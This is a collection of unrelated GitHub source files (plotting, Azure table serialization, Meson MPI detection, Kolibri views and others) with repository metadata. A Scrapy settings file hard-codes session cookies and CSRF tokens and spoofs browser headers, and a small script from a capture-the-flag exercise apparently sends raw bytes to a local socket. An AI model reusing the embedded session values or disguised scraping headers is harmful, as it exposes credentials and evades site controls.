# Could additionally do cc = table.squeeze() but is it worth it?
# Convert table (rows) into rows (lists) of equal length
rows = [[row.get(c, None) for c in cc] for row in table.values()]
# Align cols
h2 = "\n" if len(cc) > 1 else "" # super-header?
headers, *rows = make_cols(rows, cc, subcols, h2)
# Prepend left-side (attr) table
if squeeze_labels:
table = table.squeeze()
headers = [h2+k for k in table.dims] + [h2+'⑊'] + headers
for i, (key, row) in enumerate(zip(table, rows)):
rows[i] = [*key] + ['|'] + row
print()
if dims['outer']:
# Title
table_title = "Table for " + table_coord.repr2(True).strip("()")
if colorize:
clrs = colorama.Back.YELLOW, colorama.Fore.BLACK
table_title = color_text(table_title, *clrs)
print(table_title)
table = tabulate(rows, headers).replace('␣', ' ')
if colorize:
table = stripe(table, slice(2, None))
print(table)
return tables
def plot(self, statkey, dims, get_style=default_styles,
fignum=None, figsize=None, panels=None, costfun=None,
title1=None, title2=None, unique_labels=True, squeeze_labels=True):
"""Plot (tables of) results.
Analagously to `xpSpace.print`,
the averages are grouped by `dims["inner"]`,
which here plays the role of the x-axis.
The averages can also be grouped by `dims["outer"]`,
producing a figure with multiple (columns of) panels.
The optimal points/parameters/attributes are plotted in smaller panels
below the main plot. This can be turned off by providing the figure
dims through the `panels` argument.
The parameters `statkey`, `dims`, `costfun`, `sqeeze_labels`
are documented in `xpSpace.print`.
Parameters
----------
get_style: function
A function that takes an object, and returns a dict of line styles,
usually as a function of the object's attributes.
title1: anything
Figure title (in addition to the the defaults).
title2: anything
Figure title (in addition to the defaults). Goes on a new line.
unique_labels: bool
Only show a given line label once, even if it appears in several panels.
squeeze_labels:
Don't include redundant attributes in the labels.
"""
def plot1(panelcol, row, style):
"""Plot a given line (row) in the main panel and the optim panels.
Involves: Sort, insert None's, handle constant lines.
"""
# Make a full row (yy) of vals, whether is_constant or not.
# is_constant = (len(row)==1 and next(iter(row))==row.Coord(None))
is_constant = all(x == row.Coord(None) for x in row)
if is_constant:
yy = [row[None, ] for _ in xticks]
style.marker = None
else:
yy = [row.get(row.Coord(x), None) for x in xticks]
# Plot main
row.vals = [getattr(y, 'val', None) for y in yy]
row.handles = {}
row.handles["main_panel"] = panelcol[0].plot(xticks, row.vals, **style)[0]
# Plot tuning params
row.tuned_coords = {} # Store ordered, "transposed" argmins
argmins = [getattr(y, 'tuned_coord', None) for y in yy]
for a, panel in zip(dims["optim"] or (), panelcol[1:]):
yy = [getattr(coord, a, None) for coord in argmins]
row.tuned_coords[a] = yy
# Plotting all None's sets axes units (like any plotting call)
# which can cause trouble if the axes units were actually supposed
# to be categorical (eg upd_a), but this is only revealed later.
if not all(y == None for y in yy):
style["alpha"] = 0.2
row.handles[a] = panel.plot(xticks, yy, **style)
def label_management(table):
def pruner(style):
label = style.get("label", None)
if unique_labels:
if label in register:
del style["label"]
elif label:
register.add(style["label"])
pruner.has_labels = True
elif label:
pruner.has_labels = True
pruner.has_labels = False
def squeezer(coord):
return intersect(coord._asdict(), label_attrs)
if squeeze_labels:
label_attrs = xpList(table.keys()).prep_table()[0]
else:
label_attrs = table.dims
return pruner, squeezer
register = set()
def beautify(panels, title, has_labels):
panel0 = panels[0]
# panel0.set_title(title)
panel0.text(.5, 1, title, fontsize=12, ha="center", va="bottom",
transform=panel0.transAxes, bbox=dict(
facecolor='lightyellow', edgecolor='k',
alpha=0.99, boxstyle="round,pad=0.25",
# NB: padding makes label spill into axes
))
if has_labels:
panel0.legend()
if panel0.is_first_col():
panel0.set_ylabel(statkey)
panels[-1].set_xlabel(dims["inner"][0])
# Tuning panels:
for a, panel in zip(dims["optim"] or (), panels[1:]):
if panel.is_first_col():
panel.set_ylabel(f"Optim.\n{a}")
# Nest dims through table_tree()
dims, tables = self.table_tree(statkey, dims, costfun=costfun)
assert len(dims["inner"]) == 1, "You must chose a valid attr. for the abscissa."
if not hasattr(self, "ticks"):
# TODO 6: this is probationary.
# In case self is actually a subspace, it may be that it does not contain
# all of the ticks of the original xpSpace. This may be fine,
# and we generate the ticks here again. However, this is costly-ish, so you
# should maybe simply (manually) assign them from the original xpSpace.
# And maybe you actually want the plotted lines to have holes where self
# has no values. Changes in the ticks are not obvious to the naked eye,
# unlike the case for printed tables (where column changes are quite clear).
print(color_text("Warning:", colorama.Fore.RED), "Making new x-ticks."
"\nConsider assigning them yourself from the original"
" xpSpace to this subspace.")
self.make_ticks(xpList(self).prep_table()[0])
xticks = self.tickz(dims["inner"][0])
# Create figure axes
if panels is None:
nrows = len(dims['optim'] or ()) + 1
ncols = len(tables)
maxW = 12.7 # my mac screen
figsize = figsize or (min(5*ncols, maxW), 7)
gs = dict(
height_ratios=[6]+[1]*(nrows-1),
hspace=0.05, wspace=0.05,
# eyeballed:
left=0.15/(1+np.log(ncols)),
right=0.97, bottom=0.06, top=0.9)
# Create
_, panels = place.freshfig(num=fignum, figsize=figsize,
nrows=nrows, sharex=True,
ncols=ncols, sharey='row',
gridspec_kw=gs, squeeze=False)
else:
panels = np.atleast_2d(panels)
# Fig. Title
fig = panels[0, 0].figure
fig_title = "Averages wrt. time"
if dims["mean"] is not None:
fig_title += " and " + ", ".join([repr(c) for c in dims['mean']])
if title1 is not None:
fig_title += ". " + title1
if title2 is not None:
with nonchalance():
title2 = title2.relative_to(rc.dirs["data"])
fig_title += "\n" + str(title2)
fig.suptitle(fig_title)
# Loop outer
for ax_column, (table_coord, table) in zip(panels.T, tables.items()):
table.panels = ax_column
label_prune, label_squeeze = label_management(table)
for coord, row in table.items():
style = get_style(NoneDict(label_squeeze(coord)))
label_prune(style)
plot1(table.panels, row, style)
beautify(table.panels,
title=("" if dims["outer"] is None else
table_coord.repr2(True).strip("()")),
has_labels=label_prune.has_labels)
tables.fig = fig # add reference to fig
return tables
|
{
"content_hash": "56ff7478441ff73026b8ae6e392f7030",
"timestamp": "",
"source": "github",
"line_count": 891,
"max_line_length": 88,
"avg_line_length": 40.32098765432099,
"alnum_prop": 0.5467906251739687,
"repo_name": "nansencenter/DAPPER",
"id": "33017693bf0c0f150a8bbd99a34307c238cd3c9e",
"size": "35947",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dapper/xp_process.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Fortran",
"bytes": "54649"
},
{
"name": "Makefile",
"bytes": "907"
},
{
"name": "Python",
"bytes": "609077"
},
{
"name": "Shell",
"bytes": "2975"
}
],
"symlink_target": ""
}
|
BOT_NAME = 'cnbetabot'
SPIDER_MODULES = ['cnbetabot.spiders']
NEWSPIDER_MODULE = 'cnbetabot.spiders'
ITEM_PIPELINES = ['cnbetabot.pipelines.CnbetabotPipeline']
DATABASE = {
'drivername': 'postgres',
'host': 'localhost',
'port': '5432',
'username': 'dbuser',
'password': 'YOUR_PASSWORD',
'database': 'scrape'
}
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'cnbetabot (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
DEFAULT_REQUEST_HEADERS = {
"Accept": "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-cn,en-us;q=0.7,en;q=0.3",
"Connection": "keep-alive",
"Cookie": "Hm_lvt_4216c57ef1855492a9281acd553f8a6e=1449671129,1449719052; _ga=GA1.2.738214413.1449671129; tma=208385984.3330358.1449671129113.1449671129113.1449671129113.1; tmd=7.208385984.3330358.1449671129113.; bfd_g=882eecf4bbc243d000005c9e0009d461566839da; Hm_lpvt_4216c57ef1855492a9281acd553f8a6e=1449720326; bfd_s=208385984.5513774.1449719052707; tmc=3.208385984.76674402.1449719052709.1449719187960.1449720327022; csrf_token=ece1347ef5d958a6bd8f402f9c056b1304925e5d; _gat=1",
"DNT": "1",
"Host": "www.cnbeta.com",
"Referer": "http://www.cnbeta.com/",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:30.0) Gecko/20100101 Firefox/30.0",
"X-Requested-With": "XMLHttpRequest",
}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'cnbetabot.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'cnbetabot.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'cnbetabot.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
AUTOTHROTTLE_ENABLED=True
# The initial download delay
AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
JSON_TEMPLATE = 'http://www.cnbeta.com/more?jsoncallback=jQuery18007695096260749249_1449720320965&type=all&page=%s&csrf_token=a6e20533b07adb18018e89bc6c90eb6df3c25f33&_=1449720329349'
PAGE_LIMIT = 5
|
{
"content_hash": "3174b56d8d141690c9c7e8e77609210f",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 485,
"avg_line_length": 41.27956989247312,
"alnum_prop": 0.773117999479031,
"repo_name": "cdpath/cnbetabot",
"id": "5b1860b0e49453e815dc30b2d65b773bb44d63d5",
"size": "4273",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cnbetabot/cnbetabot/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7740"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
import interpreter
setup(
name='simple interpreter',
version=interpreter.__version__,
description='Simple interpreter for Pascal language.',
author='Lucas Magnum',
author_email='lucasmagnumlopes@gmail.com',
packages=['interpreter'],
)
|
{
"content_hash": "6550d3d87f983012dd1343e0650ce8cc",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 58,
"avg_line_length": 22.692307692307693,
"alnum_prop": 0.7186440677966102,
"repo_name": "LucasMagnum/simple-interpreter",
"id": "8df9189213eafb9b523b6a7227a6fde9bab3b9c7",
"size": "318",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "282"
},
{
"name": "Makefile",
"bytes": "907"
},
{
"name": "Python",
"bytes": "35123"
}
],
"symlink_target": ""
}
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
import sys
import types
import uuid
from datetime import datetime
from json import (
dumps,
)
from math import(
isnan,
)
from .._common_conversion import (
_encode_base64,
_to_str,
)
from .._serialization import (
_to_utc_datetime,
)
from ._error import (
_ERROR_CANNOT_SERIALIZE_VALUE_TO_ENTITY,
_ERROR_TYPE_NOT_SUPPORTED,
_ERROR_VALUE_TOO_LARGE,
)
from .models import (
EntityProperty,
TablePayloadFormat,
EdmType,
)
if sys.version_info < (3,):
def _new_boundary():
return str(uuid.uuid1())
else:
def _new_boundary():
return str(uuid.uuid1()).encode('utf-8')
_DEFAULT_ACCEPT_HEADER = ('Accept', TablePayloadFormat.JSON_MINIMAL_METADATA)
_DEFAULT_CONTENT_TYPE_HEADER = ('Content-Type', 'application/json')
_DEFAULT_PREFER_HEADER = ('Prefer', 'return-no-content')
_SUB_HEADERS = ['If-Match', 'Prefer', 'Accept', 'Content-Type', 'DataServiceVersion']
def _get_entity_path(table_name, partition_key, row_key):
return '/{0}(PartitionKey=\'{1}\',RowKey=\'{2}\')'.format(
_to_str(table_name),
_to_str(partition_key),
_to_str(row_key))
def _update_storage_table_header(request):
''' add additional headers for storage table request. '''
# set service version
request.headers['DataServiceVersion'] = '3.0;NetFx'
request.headers['MaxDataServiceVersion'] = '3.0'
def _to_entity_binary(value):
return EdmType.BINARY, _encode_base64(value)
def _to_entity_bool(value):
return None, value
def _to_entity_datetime(value):
return EdmType.DATETIME, _to_utc_datetime(value)
def _to_entity_float(value):
if isnan(value):
return EdmType.DOUBLE, 'NaN'
if value == float('inf'):
return EdmType.DOUBLE, 'Infinity'
if value == float('-inf'):
return EdmType.DOUBLE, '-Infinity'
return None, value
def _to_entity_guid(value):
return EdmType.GUID, str(value)
def _to_entity_int32(value):
if sys.version_info < (3,):
value = long(value)
else:
value = int(value)
if value >= 2**15 or value < -(2**15):
raise TypeError(_ERROR_VALUE_TOO_LARGE.format(str(value), EdmType.INT32))
return None, value
def _to_entity_int64(value):
if sys.version_info < (3,):
ivalue = long(value)
else:
ivalue = int(value)
if ivalue >= 2**31 or ivalue < -(2**31):
raise TypeError(_ERROR_VALUE_TOO_LARGE.format(str(value), EdmType.INT64))
return EdmType.INT64, str(value)
def _to_entity_str(value):
return None, value
def _to_entity_none(value):
return None, None
# Conversion from Python type to a function which returns a tuple of the
# type string and content string.
_PYTHON_TO_ENTITY_CONVERSIONS = {
int: _to_entity_int64,
bool: _to_entity_bool,
datetime: _to_entity_datetime,
float: _to_entity_float,
str: _to_entity_str,
}
# Conversion from Edm type to a function which returns a tuple of the
# type string and content string.
_EDM_TO_ENTITY_CONVERSIONS = {
EdmType.BINARY: _to_entity_binary,
EdmType.BOOLEAN: _to_entity_bool,
EdmType.DATETIME: _to_entity_datetime,
EdmType.DOUBLE: _to_entity_float,
EdmType.GUID: _to_entity_guid,
EdmType.INT32: _to_entity_int32,
EdmType.INT64: _to_entity_int64,
EdmType.STRING: _to_entity_str,
}
if sys.version_info < (3,):
_PYTHON_TO_ENTITY_CONVERSIONS.update({
long: _to_entity_int64,
types.NoneType: _to_entity_none,
unicode: _to_entity_str,
})
def _convert_entity_to_json(source):
''' Converts an entity object to json to send.
The entity format is:
{
"Address":"Mountain View",
"Age":23,
"AmountDue":200.23,
"CustomerCode@odata.type":"Edm.Guid",
"CustomerCode":"c9da6455-213d-42c9-9a79-3e9149a57833",
"CustomerSince@odata.type":"Edm.DateTime",
"CustomerSince":"2008-07-10T00:00:00",
"IsActive":true,
"NumberOfOrders@odata.type":"Edm.Int64",
"NumberOfOrders":"255",
"PartitionKey":"mypartitionkey",
"RowKey":"myrowkey"
}
'''
properties = {}
# set properties type for types we know if value has no type info.
# if value has type info, then set the type to value.type
for name, value in source.items():
mtype = ''
if isinstance(value, EntityProperty):
conv = _EDM_TO_ENTITY_CONVERSIONS.get(value.type)
if conv is None:
raise TypeError(
_ERROR_TYPE_NOT_SUPPORTED.format(value.type))
mtype, value = conv(value.value)
else:
conv = _PYTHON_TO_ENTITY_CONVERSIONS.get(type(value))
if conv is None and sys.version_info >= (3,) and value is None:
conv = _to_entity_none
if conv is None:
raise TypeError(
_ERROR_CANNOT_SERIALIZE_VALUE_TO_ENTITY.format(
type(value).__name__))
mtype, value = conv(value)
# form the property node
properties[name] = value
if mtype:
properties[name + '@odata.type'] = mtype
# generate the entity_body
return dumps(properties)
def _convert_table_to_json(table_name):
'''
Create json to send for a given table name. Since json format for table is
the same as entity and the only difference is that table has only one
property 'TableName', so we just call _convert_entity_to_json.
table_name:
the name of the table
'''
return _convert_entity_to_json({'TableName': table_name})
def _convert_batch_to_json(batch_requests):
'''
Create json to send for an array of batch requests.
batch_requests:
an array of requests
'''
batch_boundary = b'batch_' + _new_boundary()
changeset_boundary = b'changeset_' + _new_boundary()
body = []
body.append(b'--' + batch_boundary + b'\n')
body.append(b'Content-Type: multipart/mixed; boundary=')
body.append(changeset_boundary + b'\n\n')
content_id = 1
# Adds each request body to the POST data.
for _, request in batch_requests:
body.append(b'--' + changeset_boundary + b'\n')
body.append(b'Content-Type: application/http\n')
body.append(b'Content-Transfer-Encoding: binary\n\n')
body.append(request.method.encode('utf-8'))
body.append(b' http://')
body.append(request.host.encode('utf-8'))
body.append(request.path.encode('utf-8'))
body.append(b' HTTP/1.1\n')
body.append(b'Content-ID: ')
body.append(str(content_id).encode('utf-8') + b'\n')
content_id += 1
for name, value in request.headers.items():
if name in _SUB_HEADERS:
body.append(name.encode('utf-8') + b': ')
body.append(value.encode('utf-8') + b'\n')
# Add different headers for different request types.
if not request.method == 'DELETE':
body.append(b'Content-Length: ')
body.append(str(len(request.body)).encode('utf-8'))
body.append(b'\n\n')
body.append(request.body + b'\n')
body.append(b'\n')
body.append(b'--' + changeset_boundary + b'--' + b'\n')
body.append(b'--' + batch_boundary + b'--')
return b''.join(body), 'multipart/mixed; boundary=' + batch_boundary.decode('utf-8')
|
{
"content_hash": "3fd76823dec5df4a4210e514eedd1713",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 88,
"avg_line_length": 31.909803921568628,
"alnum_prop": 0.6138626029249109,
"repo_name": "SUSE/azure-storage-python",
"id": "370f7319d2ce6f366d29f825cd04db132a335719",
"size": "8139",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure/storage/table/_serialization.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1242"
},
{
"name": "Python",
"bytes": "1193800"
}
],
"symlink_target": ""
}
|
import socket
HOST = 'localhost'
PORT = 8800
c = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
c.connect((HOST,PORT))
c.send("\xde\xad\xbe\xef")
|
{
"content_hash": "bab2309a999a81f5c201839659f80630",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 52,
"avg_line_length": 18.75,
"alnum_prop": 0.7133333333333334,
"repo_name": "RegaledSeer/netsecnoobie",
"id": "08e836903ac5be601a22dbe4fab87aa5e0e66124",
"size": "150",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pwnables/input/sockets.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "6725"
},
{
"name": "C",
"bytes": "14214"
},
{
"name": "C++",
"bytes": "2862"
},
{
"name": "Python",
"bytes": "34842"
},
{
"name": "Shell",
"bytes": "46"
}
],
"symlink_target": ""
}
|
tab = self.notebook.mainTab
tab.settings['Program'] = 'abinit'
tab.settings['Output file name'] = 'BaTiO3.out'
#
# SettingsTab
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = False
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 5
tab.settings['Mass definition'] = 'program'
#
# 0th Scenario tabs
#
tab = self.notebook.scenarios[0]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['Volume fraction'] = 0.1
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Effective medium method'] = 'Averaged permittivity'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Legend'] = 'Averaged permittivity'
# Add new scenarios
shapes = ['Plate', 'Ellipsoid', 'Plate']
hkls = [[0,0,1], [0,0,1], [1,0,0]]
for shape,hkl in zip(shapes,hkls):
self.notebook.addScenario()
tab = self.notebook.scenarios[-1]
tab.settings['Particle shape'] = shape
tab.settings['Effective medium method'] = 'Maxwell-Garnett'
tab.settings['Unique direction - h'] = hkl[0]
tab.settings['Unique direction - k'] = hkl[1]
tab.settings['Unique direction - l'] = hkl[2]
tab.settings['Legend'] = 'Maxwell-Garnett '+shape+' '+str(hkl)
#
# Plotting Tab
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 0
tab.settings['Maximum frequency'] = 400
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Plot title'] = 'AbInit BaTiO3 Calculation'
#
# Analysis Tab
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 400
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
|
{
"content_hash": "c18ca37ef4078f1d18b58214f8d370f1",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 66,
"avg_line_length": 33.45614035087719,
"alnum_prop": 0.6958573675930781,
"repo_name": "JohnKendrick/PDielec",
"id": "2af84711bd557e6be11267ae52ae679f82bc208b",
"size": "1921",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Examples/AbInit/BaTiO3/script.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "811"
},
{
"name": "Makefile",
"bytes": "802"
},
{
"name": "Python",
"bytes": "879573"
},
{
"name": "TeX",
"bytes": "70400"
}
],
"symlink_target": ""
}
|
"""Kills any running jobs trees in a rogue jobtree.
"""
import os
import sys
import xml.etree.cElementTree as ET
from sonLib.bioio import logger
from sonLib.bioio import getBasicOptionParser
from sonLib.bioio import parseBasicOptions
from jobTree.src.master import getConfigFileName
from jobTree.src.jobTreeRun import loadTheBatchSystem
def main():
parser = getBasicOptionParser("usage: %prog [--jobTree] JOB_TREE_DIR [more options]", "%prog 0.1")
parser.add_option("--jobTree", dest="jobTree",
help="Directory containing the job tree to kill")
options, args = parseBasicOptions(parser)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
assert len(args) <= 1 #Only jobtree may be specified as argument
if len(args) == 1: #Allow jobTree directory as arg
options.jobTree = args[0]
logger.info("Parsed arguments")
assert options.jobTree != None #The jobtree should not be null
assert os.path.isdir(options.jobTree) #The job tree must exist if we are going to kill it.
logger.info("Starting routine to kill running jobs in the jobTree: %s" % options.jobTree)
config = ET.parse(getConfigFileName(options.jobTree)).getroot()
batchSystem = loadTheBatchSystem(config) #This should automatically kill the existing jobs.. so we're good.
for jobID in batchSystem.getIssuedJobIDs(): #Just in case we do it again.
batchSystem.killJobs(jobID)
logger.info("All jobs SHOULD have been killed")
def _test():
import doctest
return doctest.testmod()
if __name__ == '__main__':
_test()
main()
|
{
"content_hash": "1056151c4eb9f41df6b2cc3795787843",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 111,
"avg_line_length": 36.4,
"alnum_prop": 0.6910866910866911,
"repo_name": "harvardinformatics/jobTree",
"id": "da074428aa6583231cd8a9b242fa10285a62af58",
"size": "2768",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/jobTreeKill.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "956"
},
{
"name": "Python",
"bytes": "271544"
}
],
"symlink_target": ""
}
|
from django.db.models.query import F
from rest_framework.permissions import IsAuthenticated
from rest_framework.viewsets import ReadOnlyModelViewSet
from .serializers import LearnerClassroomSerializer
from kolibri.core.auth.api import KolibriAuthPermissionsFilter
from kolibri.core.auth.filters import HierarchyRelationsFilter
from kolibri.core.auth.models import Classroom
from kolibri.core.lessons.models import Lesson
from kolibri.core.lessons.models import LessonAssignment
from kolibri.core.lessons.serializers import LessonSerializer
class LearnerClassroomViewset(ReadOnlyModelViewSet):
"""
Returns all Classrooms for which the requesting User is a member,
along with all associated assignments.
"""
filter_backends = (KolibriAuthPermissionsFilter,)
permission_classes = (IsAuthenticated,)
serializer_class = LearnerClassroomSerializer
def get_queryset(self):
current_user = self.request.user
memberships = current_user.memberships.filter(
collection__kind='classroom',
).values('collection_id')
return Classroom.objects.filter(id__in=memberships)
class LearnerLessonViewset(ReadOnlyModelViewSet):
"""
Special Viewset for Learners to view Lessons to which they are assigned.
The core Lesson Viewset is locked down to Admin users only.
"""
serializer_class = LessonSerializer
permission_classes = (IsAuthenticated,)
def get_queryset(self):
assignments = HierarchyRelationsFilter(LessonAssignment.objects.all()) \
.filter_by_hierarchy(
target_user=self.request.user,
ancestor_collection=F('collection')
)
return Lesson.objects.filter(
lesson_assignments__in=assignments,
is_active=True
)
|
{
"content_hash": "8c2dd9295fab367ea477bc44d1718ad2",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 80,
"avg_line_length": 37.5625,
"alnum_prop": 0.7343316694398225,
"repo_name": "DXCanas/kolibri",
"id": "905cf2dc9414929b172864ac2c2c36ff98709781",
"size": "1803",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "kolibri/plugins/learn/viewsets.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "864"
},
{
"name": "CSS",
"bytes": "32872"
},
{
"name": "Dockerfile",
"bytes": "4332"
},
{
"name": "Gherkin",
"bytes": "115979"
},
{
"name": "HTML",
"bytes": "14251"
},
{
"name": "JavaScript",
"bytes": "890295"
},
{
"name": "Makefile",
"bytes": "9885"
},
{
"name": "Python",
"bytes": "1363204"
},
{
"name": "Shell",
"bytes": "10407"
},
{
"name": "Vue",
"bytes": "944905"
}
],
"symlink_target": ""
}
|
"""The testing subpackage contains functions for verifying and testing dimod
objects. Testing objects/functions can be imported from the :mod:`dimod.testing`
namespace. For example:
>>> from dimod.testing import assert_sampler_api
"""
from dimod.testing.asserts import *
|
{
"content_hash": "98e0623ed9b50d358965bd850bf35505",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 80,
"avg_line_length": 34.125,
"alnum_prop": 0.7875457875457875,
"repo_name": "oneklc/dimod",
"id": "81b8416e4e8633b259983ba61da4cdaeb38a2aa7",
"size": "965",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dimod/testing/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C++",
"bytes": "59430"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "676178"
}
],
"symlink_target": ""
}
|
import functools
import os
import re
import shlex
import sysconfig
from pathlib import Path
from .. import mlog
from .. import mesonlib
from ..environment import detect_cpu_family
from .base import (
DependencyException, DependencyMethods, ExternalDependency,
ExternalProgram, ExtraFrameworkDependency, PkgConfigDependency,
ConfigToolDependency,
)
class MPIDependency(ExternalDependency):
def __init__(self, environment, kwargs):
language = kwargs.get('language', 'c')
super().__init__('mpi', environment, language, kwargs)
kwargs['required'] = False
kwargs['silent'] = True
self.is_found = False
# NOTE: Only OpenMPI supplies a pkg-config file at the moment.
if language == 'c':
env_vars = ['MPICC']
pkgconfig_files = ['ompi-c']
default_wrappers = ['mpicc']
elif language == 'cpp':
env_vars = ['MPICXX']
pkgconfig_files = ['ompi-cxx']
default_wrappers = ['mpic++', 'mpicxx', 'mpiCC']
elif language == 'fortran':
env_vars = ['MPIFC', 'MPIF90', 'MPIF77']
pkgconfig_files = ['ompi-fort']
default_wrappers = ['mpifort', 'mpif90', 'mpif77']
else:
raise DependencyException('Language {} is not supported with MPI.'.format(language))
for pkg in pkgconfig_files:
try:
pkgdep = PkgConfigDependency(pkg, environment, kwargs, language=self.language)
if pkgdep.found():
self.compile_args = pkgdep.get_compile_args()
self.link_args = pkgdep.get_link_args()
self.version = pkgdep.get_version()
self.is_found = True
self.pcdep = pkgdep
break
except Exception:
pass
if not self.is_found:
# Prefer environment.
for var in env_vars:
if var in os.environ:
wrappers = [os.environ[var]]
break
else:
# Or search for default wrappers.
wrappers = default_wrappers
for prog in wrappers:
result = self._try_openmpi_wrapper(prog)
if result is not None:
self.is_found = True
self.version = result[0]
self.compile_args = self._filter_compile_args(result[1])
self.link_args = self._filter_link_args(result[2])
break
result = self._try_other_wrapper(prog)
if result is not None:
self.is_found = True
self.version = result[0]
self.compile_args = self._filter_compile_args(result[1])
self.link_args = self._filter_link_args(result[2])
break
if not self.is_found and mesonlib.is_windows():
result = self._try_msmpi()
if result is not None:
self.is_found = True
self.version, self.compile_args, self.link_args = result
def _filter_compile_args(self, args):
"""
MPI wrappers return a bunch of garbage args.
Drop -O2 and everything that is not needed.
"""
result = []
multi_args = ('-I', )
if self.language == 'fortran':
fc = self.env.coredata.compilers['fortran']
multi_args += fc.get_module_incdir_args()
include_next = False
for f in args:
if f.startswith(('-D', '-f') + multi_args) or f == '-pthread' \
or (f.startswith('-W') and f != '-Wall' and not f.startswith('-Werror')):
result.append(f)
if f in multi_args:
# Path is a separate argument.
include_next = True
elif include_next:
include_next = False
result.append(f)
return result
def _filter_link_args(self, args):
"""
MPI wrappers return a bunch of garbage args.
